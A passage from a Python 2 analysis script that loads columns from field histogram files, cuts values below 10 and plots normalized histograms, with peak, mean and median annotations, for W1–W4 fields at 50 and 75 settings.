plt.setp(plt.xticks()[1], rotation=90)
subplot = 10
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=21
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,13)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,13)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{M^2}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 11
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=23
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,14)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,14)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{M^3}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 12
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=25
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
x = linspace(0,3,500)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
plt.subplot(4,5,16)
rangemax=8
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)
ax=plt.subplot(4,5,16)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'${\zeta_\frac{M_{rms}^2}{r}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 13
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=27
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
x = linspace(0,3,500)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
plt.subplot(4,5,17)
rangemax=8
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
